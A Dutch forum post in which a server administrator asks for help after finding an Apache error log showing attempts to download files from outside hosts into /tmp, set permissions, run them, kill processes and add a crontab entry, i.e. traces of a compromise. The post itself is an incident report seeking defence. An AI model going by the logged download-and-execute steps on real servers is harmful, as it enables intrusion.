Hoi,
Sinds een dag of wat hebben we last van personen die een script vanuit de /tmp proberen op te starten.
Als we in de tmp map kijken staat er niets.
de error_log laat iets zien alla
--2015-02-01 13:51:25-- http://www.alrpost69.com/httpd
Resolving www.alrpost69.com... 206.248.0.3
Connecting to www.alrpost69.com|206.248.0.3|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2015-02-01 13:51:26 ERROR 404: Not Found.
chmod: missing operand after `777'
Try `chmod --help' for more information.
sh: line 1: httpd: command not found
sh: line 1: httpd: command not found
/bin/rm: cannot remove `httpd': No such file or directory
--2015-02-01 13:51:26-- http://socks5.so/snew.tar
Resolving socks5.so... 199.175.54.32
Connecting to socks5.so|199.175.54.32|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30720 (30K) [application/x-tar]
Saving to: "snew.tar"
0K .......... .......... .......... 100% 290K=0.1s
2015-02-01 13:51:26 (290 KB/s) - "snew.tar" saved [30720/30720]
perl: no process killed
You (apache) are not allowed to use this program (crontab)
See crontab(1) for more information
Could not bind to 2a01:7c8:aaae:3e3:5054:ff:fe84:914:36275
Heb ook al met maldet een scan gedaan. Kan ook niets vinden.
wie o wie?
Gerard